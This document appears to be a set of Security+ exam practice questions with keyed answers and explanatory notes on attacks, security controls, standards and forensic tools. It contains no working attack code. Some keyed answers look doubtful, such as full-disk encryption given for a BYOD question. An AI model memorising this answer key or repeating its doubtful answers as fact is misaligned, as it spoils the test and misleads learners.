QUESTION 1
An organization is developing an authentication service for use at the entry and exit ports of country borders. The service will use data feeds obtained from passport systems, passenger manifests, and high- definition video feeds from CCTV systems that are located at the ports. The service will incorporate machine-learning techniques to eliminate biometric enrollment processes while still allowing authorities to identify passengers with increasing accuracy over time. The more frequently passengers travel, the more accurately the service will identify them. Which of the following biometrics will MOST likely be used, without the need for enrollment? (Choose two.)

A. Voice 
B. Gait 
C. Vein 
D. Facial 
E. Retina
F. Fingerprint

Answer: BD				

END
QUESTION 2
A small company that does not have security staff wants to improve its security posture. Which of the following would BEST assist the company?

A. MSSP - Third-party provision of security configuration and monitoring as an outsourced service.
B. SOAR - A class of security tools that facilitates incident response, threat hunting, and security configuration 
       by orchestrating automated runbooks and delivering data enrichment.
C. IaaS 
D. PaaS

Answer: A

(MSSP) Managed Security Services Provider - a means of fully outsourcing responsibility for information assurance 
to a third party. This type of solution is expensive but can be a good fit for a Small and Medium-Sized Enterprise (SME) 
that has experienced rapid growth and has no in-house security capability

Security Orchestration, Automation, and Response - Automation is the action of scripting a single activity, 
while orchestration is the action of coordinating multiple automations (and possibly manual activity) to perform a complex,
multistep task. In the case of security orchestration, automation, and response (SOAR), this task is principally incident response, though the technologies can also be used for tasks such as threat hunting too. SOAR is designed as a solution 
to the problem of the volume of alerts overwhelming analysts' ability to respond, measured as the mean time to respond 
(MTTR). A SOAR may be implemented as a standalone technology or integrated with a SIEM - often referred to as a next-gen SIEM. The basis of SOAR is to scan the organization's store of security and threat intelligence, analyze it using machine/deep learning techniques, and then use that data to automate and provide data enrichment for the workflows that drive incident response and threat hunting. It can also assist with provisioning tasks, such as creating and deleting user accounts, making shares available, or launching VMs from templates, to try to eliminate configuration errors. The SOAR will use technologies 
such as cloud and SDN/SDV (Software Defined Networking/Software Defined Visibility) APIs, orchestration tools, and 
cyberthreat intelligence (CTI) feeds to integrate the different systems that it is managing. It will also leverage technologies 
such as automated malware signature creation and user and entity behavior analytics (UEBA) to detect threats.

SDN (software defined networking) - APIs and compatible hardware/virtual appliances allowing for programmable
network appliances and systems.

SDV (software defined visibility) - APIs for reporting configuration and state data for automated monitoring and alerting.

END
QUESTION 3
An organization's help desk is flooded with phone calls from users stating they can no longer access certain websites. The help desk escalates the issue to the security team, as these websites were accessible the previous day. The security analysts run the following command: ipconfig /flushdns, but the issue persists. Finally, an analyst changes the DNS server for an impacted machine, and the issue goes away. Which of the following attacks MOST likely occurred on the original DNS server?

A. DNS cache poisoning 
B. Domain hijacking
C. Distributed denial-of-service 
D. DNS tunneling
Answer: A 

DNS cache poisoning - also known as DNS spoofing, is a type of attack that exploits vulnerabilities in the domain name system (DNS) to divert Internet traffic away from legitimate servers and towards fake ones. 
One of the reasons DNS poisoning is so dangerous is because it can spread from DNS server to DNS server.

Domain hijacking or domain theft is the act of changing the registration of a domain name without the permission 
of its original registrant, or by abuse of privileges on domain hosting and registrar software systems.

DNS Tunneling is a method of cyber-attack that encodes the data of other programs or protocols in DNS queries and responses. DNS tunneling often includes data payloads that can be added to an attacked DNS server and used to control a remote server and applications. Typically, DNS tunneling requires the compromised system to have external network connectivity, as DNS tunneling requires access to an internal DNS server with network access. Hackers must also control a domain and a server that can act as an authoritative server in order to execute the server-side tunneling and data payload executable programs.

END
QUESTION 4
A cybersecurity manager has scheduled biannual meetings with the IT team and department leaders to discuss how they would respond to hypothetical cyberattacks. During these meetings, the manager presents a scenario and injects additional information throughout the session to replicate what might occur in a dynamic cybersecurity event involving the company, its facilities, its data, and its staff. Which of the following describes what the manager is doing?

A. Developing an incident response plan 
B. Building a disaster recovery plan
C. Conducting a tabletop exercise 
D. Running a simulation exercise

Answer: C

Tabletop exercises - staff "ghost" the same procedures as they would in a disaster, without actually creating disaster conditions or applying or changing anything. These are simple to set up but do not provide any sort of practical evidence of things that could go wrong, time to complete, and so on.

END
QUESTION 5
A RAT that was used to compromise an organization's banking credentials was found on a user's computer. The RAT evaded antivirus detection. It was installed by a user who has local administrator rights to the system as part of a remote management tool set. Which of the following recommendations would BEST prevent this from reoccurring?

A. Create a new acceptable use policy.
B. Segment the network into trusted and untrusted zones. 
C. Enforce application whitelisting.
D. Implement DLP at the network boundary.

Answer: C

Execution control can be implemented as either an allow list or a block list.

> Allow list is a highly restrictive policy that means only running authorized processes and scripts. Allowing only specific applications that have been added to a list will inevitably hamper users at some point and increase support time and costs. 
For example, a user might need to install a conferencing application at short notice.

> Block list is a permissive policy that only prevents execution of listed processes and scripts. It is vulnerable to software that 
has not previously been identified as malicious (or capable of or vulnerable to malicious use).

Terminology such as black/whitelist is non-inclusive and is being replaced by neutral terms (block/allow lists).

END
QUESTION 6
A security analyst is reviewing a new website that will soon be made publicly available. The analyst sees the following in the URL:

http://dev-site.comptia.org/home/show.php?sessionID=77276554&loc=us

The analyst then sends an internal user a link to the new website for testing purposes, and when the user clicks the link, the analyst is able to browse the website with the following URL:

http://dev-site.comptia.org/home/show.php?sessionID=98988475&loc=us

Which of the following application attacks is being tested?

A. Pass-the-hash 
B. Session replay 
C. Object dereference
D. Cross-site request forgery

Answer: D

XSRF (cross-site request forgery) A malicious script hosted on the attacker's site that can exploit a session started on
another site in the same browser. Also known as client-side request forgery or CSRF.

A client-side or cross-site request forgery (CSRF or XSRF) can exploit applications that use cookies to authenticate users 
and track sessions. To work, the attacker must convince the victim to start a session with the target site. The attacker must then pass an HTTP request to the victim's browser that spoofs an action on the target site, such as changing a password or an email address.

Dereferencing a reference means accessing the object it's referencing/pointing to. 
Most commonly, that means accessing a property or calling a method on the object.

END
QUESTION 7
A network administrator has been asked to install an IDS to improve the security posture of an organization. Which of the following control types is an IDS?

A. Corrective 
B. Physical 
C. Detective
D. Administrative

Answer: C

END
QUESTION 8
Which of the following should be put in place when negotiating with a new vendor about the timeliness of the response to a significant outage or incident?

A. MOU 
B. MTTR
C. SLA 
D. NDA

Answer: C

Memorandum of understanding (MOU) - A preliminary or exploratory agreement to express an intent to work together. MOUs are usually intended to be relatively informal and not to act as binding contracts. MOUs almost always have clauses stating that the parties shall respect confidentiality, however.

Non-disclosure agreement (NDA) - Legal basis for protecting information assets. NDAs are used between companies and employees, between companies and contractors, and between two companies. If the employee or contractor breaks this
agreement and does share such information, they may face legal consequences. NDAs are useful because they deter employees and contractors from violating the trust that an employer places in them.

Service level agreement (SLA) - A contractual agreement setting out the detailed terms under which a service is provided.

END
QUESTION 9
A startup company is using multiple SaaS and IaaS platforms to stand up a corporate infrastructure and build out a customer-facing web application. Which of the following solutions would be BEST to provide security, manageability, and visibility into the platforms?

A. SIEM 
B. DLP 
C. CASB 
D. SWG

Answer: C

A cloud access security broker (CASB) is enterprise management software designed to mediate access to cloud services by users across all types of devices. CASB vendors include Blue Coat, now owned by Symantec, SkyHigh Networks, now
owned by MacAfee, Forcepoint, Microsoft Cloud App Security and Cisco Cloudlock.

SWG - Secure Web Gateways are a proxy-based firewall, content filter, and intrusion detection/prevention systems.

END
QUESTION 10
A root cause analysis reveals that a web application outage was caused by one of the company's developers uploading a newer version of the third-party libraries that were shared among several applications. Which of the following implementations would be BEST to prevent the issue from reoccurring?

A. CASB 
B. SWG
C. Containerization 
D. Automated failover

Answer: C

Containerization allows the employer to manage and maintain the portion of the device that interfaces with the corporate network. An enterprise workspace with a defined selection of apps and a separate container is created. This container isolates
corporate apps from the rest of the device. There may be a requirement for additional authentication to access the workspace. 

The container can also enforce storage segmentation. With storage segmentation the container is associated with a directory 
on the persistent storage device that is not readable or writable by apps that are not in the container. Conversely, apps cannot
write to areas outside the container, such as external media or using copy and paste to a non-container app. 

A container is a standard unit of software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another. A Docker container image is a lightweight, standalone, executable package of software that includes everything needed to run an application: code, runtime, system tools, system libraries and settings.

END
QUESTION 11
A security administrator suspects there may be unnecessary services running on a server. Which of the following tools will the administrator MOST likely use to confirm the suspicions?

A. Nmap
B. Wireshark 
C. Autopsy 
D. DNSEnum

Answer: A

Nmap Versatile port scanner used for topology, host, service, and OS discovery and enumeration.

The Sleuth Kit (sleuthkit.org) is an open-source collection of command line tools and programming libraries for disk imaging 
and file analysis. Autopsy is a graphical front-end for these tools and acts as a case management/workflow tool. 
The program can be extended with plug-ins for various analysis functions. Autopsy is available for Windows and can be compiled from the source code to run on Linux.

While you can use tools such as dig and whois to query name records and hosting details and to check that external DNS services are not leaking too much information, a tool such as DNSEnum packages a number of tests into a single query (github.com/fwaeytens/dnsenum). As well as hosting information and name records, dnsenum can try to work out the 
IP address ranges that are in use.

END
QUESTION 12
A company has drafted an insider-threat policy that prohibits the use of external storage devices. Which of the following would BEST protect the company from data exfiltration via removable media?

A. Monitoring large data transfer transactions in the firewall logs
B. Developing mandatory training to educate employees about the removable media policy 
C. Implementing a group policy to block user access to system files
D. Blocking removable-media devices and write capabilities using a host-based security tool

Answer: D

Bit Locker To Go - Configures whether BitLocker protection is required for a computer to be able to write data to a removable data drive (ex: USB flash drive). All removable data drives that are not BitLocker-protected will be mounted as read-only. If the drive is protected by BitLocker, it will be mounted with read and write access.

How to control USB devices and other removable media using Intune (Windows 10) - Windows security | Microsoft Docs

END
QUESTION 13
In which of the following common use cases would steganography be employed?

A. Obfuscation 
B. Integrity
C. Non-repudiation 
D. Blockchain

Answer: A

Steganography (literally meaning "hidden writing") is a technique for obscuring the presence of a message. 
Typically, information is embedded where you would not expect to find it; a message hidden in a picture, for instance. 
The container document or file is called the covertext. A steganography tool is software that either facilitates this
or conversely that can be used to detect the presence of a hidden message within a covertext.

Blockchain is a concept in which an expanding list of transactional records is secured using cryptography. 
Each record is referred to as a block and is run through a hash function. 
The hash value of the previous block in the chain is added to the hash calculation of the next block in the chain. 
This ensures that each successive block is cryptographically linked. 
Each block validates the hash of the previous block, all the way through to the beginning of the chain, ensuring that each historical transaction has not been tampered with. In addition, each block typically includes a timestamp of one or
more transactions, as well as the data involved in the transactions themselves.

END
QUESTION 14
To secure an application after a large data breach, an e-commerce site will be resetting all users' credentials. Which of the following will BEST ensure the site's users are not compromised after the reset?

A. A password reuse policy
B. Account lockout after three failed attempts 
C. Encrypted credentials in transit
D. A geofencing policy based on login history

Answer: C

END
QUESTION 15
In which of the following risk management strategies would cybersecurity insurance be used?

A. Transference 
B. Avoidance 
C. Acceptance 
D. Mitigation

Answer: A

END
QUESTION 16
An organization has implemented a policy requiring the use of conductive metal lockboxes for personal electronic devices outside of a secure research lab. Which of the following did the organization determine to be the GREATEST risk to intellectual property when creating this policy?

5A. The theft of portable electronic devices 
B. Geotagging in the metadata of images 
C. Bluesnarfing of mobile devices
D. Data exfiltration over a mobile hotspot

Answer: C

END
QUESTION 17
A security analyst is using a recently released security advisory to review historical logs, looking for the specific activity that was outlined in the advisory. Which of the following is the analyst doing?

A. A packet capture
B. A user behavior analysis 
C. Threat hunting
D. Credentialed vulnerability scanning

Answer: C

Retention policy is also important for retrospective incident handling, or threat hunting. A retention policy for historic logs and data captures sets the period over which these are retained. You might discover indicators of a breach months or years
after the event. Without a retention policy to keep logs and other digital evidence, it will not be possible to make any further investigation.

END
QUESTION 18
Which of the following would MOST likely support the integrity of a voting machine?

A. Asymmetric encryption 
B. Blockchain
C. Transport Layer Security 
D. Perfect forward secrecy

Answer: B

Blockchain is a concept in which an expanding list of transactional records is secured using cryptography. Each record is referred to as a block and is run through a hash function. The hash value of the previous block in the chain is added to the hash calculation of the next block in the chain. This ensures that each successive block is cryptographically linked. Each block validates the hash of the previous block, all the way through to the beginning of the chain, ensuring that each historical transaction has not been tampered with. In addition, each block typically includes a timestamp of one or more transactions, as well as the data involved in the transactions themselves.

PFS (perfect forward secrecy) A characteristic of transport encryption that ensures if a key is compromised the compromise 
will only affect a single session and not facilitate recovery of plaintext data from other sessions.

END
QUESTION 19
A Chief Information Security Officer (CISO) needs to create a policy set that meets international standards for data privacy and sharing. Which of the following should the CISO read and understand before writing the policies?

A. PCI DSS 
B. GDPR 
C. NIST
D. ISO 31000

Answer: B

GDPR - General Data Protection Regulation - Where some types of legislation address cybersecurity due diligence, others focus in whole or in part on information security as it affects privacy or personal data. Privacy is a distinct concept from security. Privacy requires that collection and processing of personal information be both secure and fair. Fairness and the right to privacy, as enacted by regulations such as the European Union's General Data Protection Regulation (GDPR), means that personal data cannot be collected, processed, or retained without the individual's informed consent. Informed consent means that the
data must be collected and processed only for the stated purpose, and that purpose must be clearly described to the user in plain language, not legalese.

PCI DSS (Payment Card Industry Data Security Standard) Information security standard for organizations that process
credit or bank card payments. 

Financial information refers to data held about bank and investment accounts, plus information such as payroll and tax returns. Payment card information comprises the card number, expiry date, and the three-digit card verification value (CVV). Cards
are also associated with a PIN, but this should never be transmitted to or handled by the merchant. Abuse of the card may also require the holder's name and the address the card is registered to. The Payment Card Industry Data Security Standard (PCI DSS) defines the safe handling and storage of this information (pcisecuritystandards.org/pci_security).

Information security and cybersecurity tasks can be classified as five functions, following the framework developed by the National Institute of Standards and Technology (NIST) (nist.gov/cyberframework/online-learning/five-functions):

> Identify - develop security policies and capabilities. Evaluate risks, threats, and vulnerabilities and recommend 
  security controls to mitigate them.
> Protect - procure/develop, install, operate, and decommission IT hardware and software assets with security as an 
  embedded requirement of every stage of this operations life cycle.
> Detect - perform ongoing, proactive monitoring to ensure that controls are effective and capable of protecting against 
  new types of threats.
> Respond - identify, analyze, contain, and eradicate threats to systems and data security.
> Recover - implement cybersecurity resilience to restore systems and data if other
controls are unable to prevent attacks.

Where ISO 21K is a cybersecurity framework, ISO 31K (iso.org/iso-31000-riskmanagement.html) is an overall framework for enterprise risk management (ERM). ERM considers risks and opportunities beyond cybersecurity by including financial,
customer service, competition, and legal liability factors. ISO 31K establishes best practices for performing risk assessments.

END
QUESTION 20
The IT department at a university is concerned about professors placing servers on the university network in an attempt to bypass security controls. Which of the following BEST represents this type of threat?

A. A script kiddie 
B. Shadow IT
C. Hacktivism 
D. White-hat

Answer: B

Shadow IT is the unauthorized use of personal hardware and software by employees or employees using software or services that has not been sanctioned for a project. Personal software may include either locally installed software or hosted applications, such as personal email or instant messenger, and may leave the organization open to a variety of security vulnerabilities. Such programs may provide a route for data exfiltration, a transport mechanism for malware, or possibly software license violations for which the company might be held liable, just to name a few of the potential problems.

END
QUESTION 21
A commercial cyber-threat intelligence organization observes IOCs (Indicator of Compromise) across a variety of unrelated customers. Prior to releasing specific threat intelligence to other paid subscribers, the organization is MOST likely obligated by contracts to:

A. perform attribution to specific APTs and nation-state actors. 
B. anonymize any PII that is observed within the IOC data.
C. add metadata to track the utilization of threat intelligence reports.
D. assist companies with impact assessments based on the observed data.

Answer: B

END
QUESTION 22
While checking logs, a security engineer notices a number of end users suddenly downloading files with the .tar & .gz extensions. Closer examination of the files reveals they are PE32 files. The end users state they did not initiate any of the downloads. Further investigation reveals the end users all clicked on an external email containing an infected MHT file with an href link a week prior. Which of the following is MOST likely occurring?

A. A RAT was installed and is transferring additional exploit tools.
B. The workstations are beaconing to a command-and-control server. 
C. A logic bomb was executed and is responsible for the data transfers. 
D. A fileless virus is spreading in the local network environment.

Answer: A

HTML Link Options Illustrated With Code Examples

https://html.com/attributes/link-href/#ixzz6gz5N4ec0

<link href=""> - Describes the relationship between the source file and an external file, such as a script.

PE32 - The Portable Executable format is a file format for executables, object code, DLLs and others used in 32-bit and 64-bit versions of Windows operating systems. The PE format is a data structure that encapsulates the information necessary for the Windows OS loader to manage the wrapped executable code.

A TAR file is an archive created by tar, a Unix-based utility used to package files together for backup or distribution purposes. It contains multiple files stored in an uncompressed format along with metadata about the archive. TAR files are commonly compressed into .GZ files with GNU Zip compression.
Fileless malware is an evolutionary strain of malicious software that has taken on a steady model of self-improvement/enhancement with a drive towards clearly defined focused attack scenarios, whose roots can be traced back to the terminate-and-stay-resident /memory resident viral programs that, once they were launched, would reside in memory awaiting a system interrupt before gaining access to their control flow; examples of which were seen in viruses such as Frodo, The Dark Avenger, Number of the Beast.

END
QUESTION 23
An organization is developing a plan in the event of a complete loss of critical systems and data. 
Which of the following plans is the organization MOST likely developing?

A. Incident response
B. Communications 
C. Disaster recovery 
D. Data retention

Answer: C

END
QUESTION 24
Which of the following is the purpose of a risk register?

A. To define the level of risk using probability and likelihood 
B. To register the risk with the required regulatory agencies 
C. To identify the risk, the risk owner, and the risk measures
D. To formally log the type of risk mitigation strategy the organization is using

Answer: C

A risk register is a document showing the results of risk assessments in a comprehensible format. The register may resemble 
the heat map risk matrix shown earlier with columns for impact and likelihood ratings, date of identification, description, countermeasures, owner/route for escalation, and status. Risk registers are also commonly depicted as scatterplot graphs, 
where impact and likelihood are each an axis, and the plot point is associated with a legend that includes more information about the nature of the plotted risk. A risk register should be shared between stakeholders (executives, department managers, and senior technicians) so that they understand the risks associated with the workflows that they manage.

END
QUESTION 25
A university with remote campuses, which all use different service providers, loses Internet connectivity across all locations. After a few minutes, Internet and VoIP services are restored, only to go offline again at random intervals, typically within four minutes of services being restored. Outages continue throughout the day, impacting all inbound and outbound connections and services. Services that are limited to the local LAN or WiFi network are not impacted, but all WAN and VoIP services are affected.

Later that day, the edge-router manufacturer releases a CVE outlining the ability of an attacker to exploit the SIP protocol handling on devices, leading to resource exhaustion and system reloads. Which of the following BEST describe this type of attack? (Choose two.)

A. DoS
B. SSL stripping 
C. Memory leak 
D. Race condition 
E. Shimming
F. Refactoring

Answer: AC

CVE (Common Vulnerabilities and Exposures) Scheme for identifying vulnerabilities developed by MITRE and adopted by NIST.

What is an SSL Stripping Attack - Explained by SSL Experts (rapidsslonline.com)
HTTP Strict Transport Security (HSTS) - forces browser to connect using HTTPS only, mitigating downgrade attacks, such as SSL stripping.

race condition - A software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events, and those events fail to execute in the order and timing intended by the developer.

shimming - The process of developing and implementing additional code between an application and the operating system to
enable functionality that would otherwise be unavailable.

To perform DLL injection the malware must already be operating with sufficient privileges, typically local administrator or system privileges. It must also evade detection by antivirus software. One means of doing this is code refactoring. Refactoring means that the code performs the same function by using different methods (control blocks, variable types, and so on). Refactoring means that the A-V software may no longer identify the malware by its signature.

END
QUESTION 26
A company recently set up an e-commerce portal to sell its product online. The company wants to start accepting credit cards for payment, which requires compliance with a security standard. Which of the following standards must the company comply with before accepting credit cards on its e-commerce platform?

A. PCI DSS 
B. ISO 22301 
C. ISO 27001 
D. NIST CSF

Answer: A

ISO 22301 - Security and resilience – Business continuity management systems – Requirements, is a management system standard published by International Organization for Standardization that specifies requirements to plan, establish, implement, operate, monitor, review, maintain and continually improve a documented management system to protect against, reduce the likelihood of occurrence, prepare for, respond to, and recover from disruptive incidents when they arise.

ISO/IEC 27K (International Organization for Standardization 27000 Series) A comprehensive set of standards for information security, including best practices for security and risk management, compliance, and technical implementation.

ISO/IEC 31K (International Organization for Standardization 31000 Series) A comprehensive set of standards for enterprise risk management.

PCI DSS (Payment Card Industry Data Security Standard) Information security standard for organizations that process
credit or bank card payments.

NIST CSF - A cybersecurity framework (CSF) is a list of activities and objectives undertaken to mitigate risks. The use of a framework allows an organization to make an objective statement of its current cybersecurity capabilities, identify a target level of capability, and prioritize investments to achieve that target. This is valuable for giving a structure to internal risk management procedures and provides an externally verifiable statement of regulatory compliance. Frameworks are also important because they save an organization from building its security program in a vacuum, or from building the program on a foundation that fails to account for important security concepts. 

END
QUESTION 27
Which of the following BEST describes a security exploit for which a vendor patch is not readily available?

A. Integer overflow 
B. Zero-day
C. End of life
D. Race condition

Answer: B

zero-day A vulnerability in software that is unpatched by the developer or an attack that exploits such a vulnerability.

An integer is a positive or negative number with no fractional component (a whole number). Integers are widely used as a data type, where they are commonly defined with fixed lower and upper bounds. An integer overflow attack causes the target
software to calculate a value that exceeds these bounds. This may cause a positive number to become negative (changing a bank debit to a credit, for instance). It could also be used where the software is calculating a buffer size; if the attacker is able to
make the buffer smaller than it should be, he or she may then be able to launch a buffer overflow attack.

END
QUESTION 28
The Chief Financial Officer (CFO) of an insurance company received an email from Ann, the company's Chief Executive Officer (CEO), requesting a transfer of $10,000 to an account. The email states Ann is on vacation and has lost her purse, containing cash and credit cards. Which of the following social engineering techniques is the attacker using?

A. Phishing 
B. Whaling
C. Typo squatting 
D. Pharming

Answer: B

END
QUESTION 29
An organization wants to implement a third factor to an existing multifactor authentication. The organization already uses a smart card and password. Which of the following would meet the organization's needs for a third factor?

A. Date of birth 
B. Fingerprints 
C. PIN
D. TPM

Answer: B

Smart Card – Something you have
Password – Something you know
Fingerprints – Something you are

END
QUESTION 30
An employee has been charged with fraud and is suspected of using corporate assets. As authorities collect evidence, and to preserve the admissibility of the evidence, which of the following forensic techniques should be used?

A. Order of volatility 
B. Data recovery 
C. Chain of custody 
D. Non-repudiation

Answer: C

Order of Volatility – CPU cache, RAM, Page or Swap file, Hard Drive, Remote logs.

END
QUESTION 31
A company wants to deploy PKI on its Internet-facing website. The applications that are currently deployed are:

www.company.com (main website)
contactus.company.com (for locating a nearby location) 
quotes.company.com (for requesting a price quote)

The company wants to purchase one SSL certificate that will work for all the existing applications and any future applications that follow the same naming conventions, such as store.company.com. Which of the following certificate types would BEST meet the requirements?

A. SAN
B. Wildcard
C. Extended validation
D. Self-signed

Answer: B

END
QUESTION 32
A Chief Security Officer (CSO) is concerned about the amount of PII that is stored locally on each salesperson's laptop. The sales department has a higher-than-average rate of lost equipment. Which of the following recommendations would BEST address the CSO's concern?

A. Deploy an MDM solution. 
B. Implement managed FDE.
C. Replace all hard drives with SEDs. 
D. Install DLP agents on each laptop.

Answer: B (Must consider C as well)

One of the drawbacks of FDE is that, because the OS performs the cryptographic operations, performance is reduced. This issue is mitigated by self-encrypting drives (SED), where the cryptographic operations are performed by the drive controller. The
SED uses a symmetric data/media encryption key (DEK/MEK) for bulk encryption and stores the DEK securely by encrypting it with an asymmetric key pair called either the authentication key (AK) or key encryption key (KEK). Use of the AK is authenticated by the user password. This means that the user password can be changed without having to decrypt and re-encrypt the drive. Early types of SEDs used proprietary mechanisms, but many vendors now develop to the Opal Storage Specification (nvmexpress.org/wp-content/uploads/TCGandNVMe_Joint_White_Paper-TCG_Storage_Opal_and_NVMe_FINAL.pdf), developed by the Trusted Computing Group (TCG).

END
QUESTION 33
A user contacts the help desk to report the following:

- Two days ago, a pop-up browser window prompted the user for a name and password after connecting to the corporate wireless SSID. This had never happened before, but the user entered the information as requested.
- The user was able to access the Internet but had trouble accessing the department share until the next day.
- The user is now getting notifications from the bank about unauthorized transactions.

Which of the following attack vectors was MOST likely used in this scenario?

A. Rogue access point 
B. Evil twin
 C. DNS poisoning 
 D. ARP poisoning

Answer: B

A rogue access point is one that has been installed on the network without authorization, whether with malicious intent or not. It is vital to periodically survey the site to detect rogue WAP. A malicious user can set up such an access point with something as basic as a smartphone with tethering capabilities, and a non-malicious user could enable such an access point by accident. If connected to a LAN without security, an unauthorized WAP creates a backdoor through which to attack the network. A rogue WAP could also be used to capture user logon attempts, allow man-in-the-middle attacks, and allow access to private information.

A rogue WAP masquerading as a legitimate one is called an evil twin. An evil twin might just have a similar name (SSID) to the legitimate one, or the attacker might use some DoS technique to overcome the legitimate WAP. This attack will not succeed
if authentication security is enabled on the WAP, unless the attacker also knows the details of the authentication method. However, the evil twin might be able to harvest authentication information from users entering their credentials by mistake.

END
QUESTION 34
A host was infected with malware. During the incident response, Joe, a user, reported that he did not receive any emails with links, but he had been browsing the Internet all day. Which of the following would MOST likely show where the malware originated?

A. The DNS logs
B. The web server logs 
C. The SIP traffic logs 
D. The SNMP logs

Answer: A

END
QUESTION 35
A recently discovered zero-day exploit utilizes an unknown vulnerability in the SMB network protocol to rapidly infect computers. Once infected, computers are encrypted and held for ransom. Which of the following would BEST prevent this attack from reoccurring?

A. Configure the perimeter firewall to deny inbound external connections to SMB ports.
B. Ensure endpoint detection and response systems are alerting on suspicious SMB connections. 
C. Deny unauthenticated users access to shared network folders.
D. Verify computers are set to install monthly operating system, updates automatically.

Answer: A

END
QUESTION 36
Joe, an employee, receives an email stating he won the lottery. The email includes a link that requests a name, mobile phone number, address, and date of birth be provided to confirm Joe's identity before sending him the prize. Which of the following BEST describes this type of email?

A. Spear phishing 
B. Whaling
C. Phishing 
D. Vishing

Answer: A

Spear phishing - An email-based or web based form of phishing which targets specific individuals.

Whaling - An email-based or web-based form of phishing which targets senior executives or wealthy individuals.

Phishing - A type of email-based social engineering attack, in which the attacker sends email from a supposedly reputable
source, such as a bank, to try to elicit private information from the victim.

Vishing - A human-based attack where the attacker extracts information while speaking over the phone or leveraging IP based
voice messaging services (VoIP).

END
QUESTION 37
Which of the following refers to applications and systems that are used within an organization without consent or approval?

A. Shadow IT 
B. OSINT
C. Dark web
D. Insider threats

Answer: A

Shadow IT is the unauthorized use of personal hardware and software by employees or employees using software or services that has not been sanctioned for a project. Personal software may include either locally installed software or hosted applications, such as personal email or instant messenger, and may leave the organization open to a variety of security vulnerabilities. Such programs may provide a route for data exfiltration, a transport mechanism for malware, or possibly software license violations for which the company might be held liable, just to name a few of the potential problems.

Open source intelligence (OSINT) - some companies operate threat intelligence services on an open-source basis, earning income from consultancy rather than directly from the platform or research effort.

END
QUESTION 38
A manufacturer creates designs for very high security products that are required to be protected and controlled by the government regulations. These designs are not accessible by corporate networks or the Internet. Which of the following is the BEST solution to protect these designs?

A. An air gap
B. A Faraday cage 
C. A shielded cable
D. A demilitarized zone

Answer: A

END
QUESTION 39
A company processes highly sensitive data and senior management wants to protect the sensitive data by utilizing classification labels. Which of the following access control schemes would be BEST for the company to implement?

A. Discretionary 
B. Rule-based 
C. Role-based 
D. Mandatory

Answer: D

Mandatory access control (MAC) is based on the idea of security clearance levels. Rather than defining ACLs on resources, each object and each subject is granted a clearance level, referred to as a label. If the model used is a hierarchical one (that is,
high clearance users are trusted to access low clearance objects), subjects are only permitted to access objects at their own clearance level or below. The labelling of objects and subjects takes place using pre-established rules. The critical point is that these rules cannot be changed by any subject account, and are therefore non-discretionary. Also, a subject is not permitted to change an object's label or to change his or her own label.

RBAC (role-based access control) An access control model where resources are protected by ACLs that are managed
by administrators and that provide user permissions based on job functions.

Rule-based access control is a term that can refer to any sort of access control model where access control policies are determined by system-enforced rules rather than system users.

Role-based access control (RBAC) adds an extra degree of centralized control to the DAC model. Under RBAC, a set of organizational roles are defined, and subjects allocated to those roles.

END
QUESTION 40
Which of the following policies would help an organization identify and mitigate potential single points of failure in the company's IT/security operations?

A. Least privilege
B. Awareness training 
C. Separation of duties 
D. Mandatory vacation

Answer: C

END
QUESTION 41
Which of the following would be the BEST method for creating a detailed diagram of wireless access points and hotspots?

A. Footprinting
B. White-box testing 
C. A drone/UAV
D. Pivoting

Answer: A

Footprinting - using software tools, such as Nmap (nmap.org), to obtain information about a host or network topology. Scans may be launched against web hosts or against wired or wireless network segments, if the attacker can gain physical access to them. While passive footprinting is possible (by limiting it to packet sniffing), most scan techniques require active network connections with the target that can be picked up by detection software.

END
QUESTION 42
Which of the following will MOST likely adversely impact the operations of unpatched traditional programmable-logic controllers, running a back-end LAMP server and OT systems with human-management interfaces that are accessible over the Internet via a web interface? (Choose two.)

A. Cross-site scripting 
B. Data exfiltration
C. Poor system logging 
D. Weak encryption
E. SQL injection
F. Server-side request forgery

Answer: EF

LAMP is a very common example of a web service stack, named as an acronym of the names of its original four open-source components: the Linux operating system, the Apache HTTP Server, the MySQL relational database management system, and the PHP programming language.

A server-side request forgery (SSRF) causes the server application to process an arbitrary request that targets another service, either on the same host or a different one (owasp.org/www-community/attacks/Server_Side_Request_Forgery). SSRF exploits both the lack of authentication between the internal servers and services (implicit trust) and weak input validation, allowing the attacker to submit unsanitized requests or API parameters. A web application takes API input via a URL or as data encoded in HTTP response headers. The web application is likely to use a standard library to read (parse) the URL or response headers. Many SSRF attacks depend on exploits against specific parsing mechanisms in standard libraries for web servers, such as Apache or IIS, and web application programming languages and tools, such as the curl library, Java, and PHP. SSRF can also use XML injection to exploit weaknesses in XML document parsing.

END
QUESTION 43
A company recently transitioned to a strictly BYOD culture due to the cost of replacing lost or damaged corporate-owned mobile devices. Which of the following technologies would be BEST to balance the BYOD culture while also protecting the company's data?

A. Containerization 
B. Geofencing
C. Full-disk encryption 
D. Remote wipe

Answer: C

END
QUESTION 44
A Chief Security Officer's (CSO's) key priorities are to improve preparation, response, and recovery practices to minimize system downtime and enhance organizational resilience to ransomware attacks. Which of the following would BEST meet the CSO's objectives?

A. Use email-filtering software and centralized account management, patch high-risk systems, and restrict administration privileges on fileshares.
B. Purchase cyber insurance from a reputable provider to reduce expenses during an incident.
C. Invest in end-user awareness training to change the long-term culture and behavior of staff and executives, reducing the organization's susceptibility to phishing attacks.
D. Implement application whitelisting and centralized event-log management, and perform regular testing and validation of full backups.

Answer: D

END
QUESTION 45
A network engineer has been asked to investigate why several wireless barcode scanners and wireless computers in a warehouse have intermittent connectivity to the shipping server. The barcode scanners and computers are all on forklift trucks and move around the warehouse during their regular use. Which of the following should the engineer do to determine the issue? (Choose two.)

A. Perform a site survey 
B. Deploy an FTK Imager 
C. Create a heat map
D. Scan for rogue access points 
E. Upgrade the security protocols 
F. Install a captive portal

Answer: AC

There are many GUI imaging utilities, including those packaged with suites such as the Forensic Toolkit and its FTK Imager. You should note that the EnCase forensics suite uses a vendor file format (.e01) compared to the raw file format used by Linux tools
like dd. The file format is important when it comes to selecting a tool for analyzing the image. The .eo1 format allows image metadata (such as the checksum, drive geometry, and acquisition time) to be stored within the same file.

END
QUESTION 46
A security administrator suspects an employee has been emailing proprietary information to a competitor. Company policy requires the administrator to capture an exact copy of the employee's hard disk. Which of the following should the administrator use?

A. dd
B. chmod 
C. dnsenum 
D. logger

Answer: A

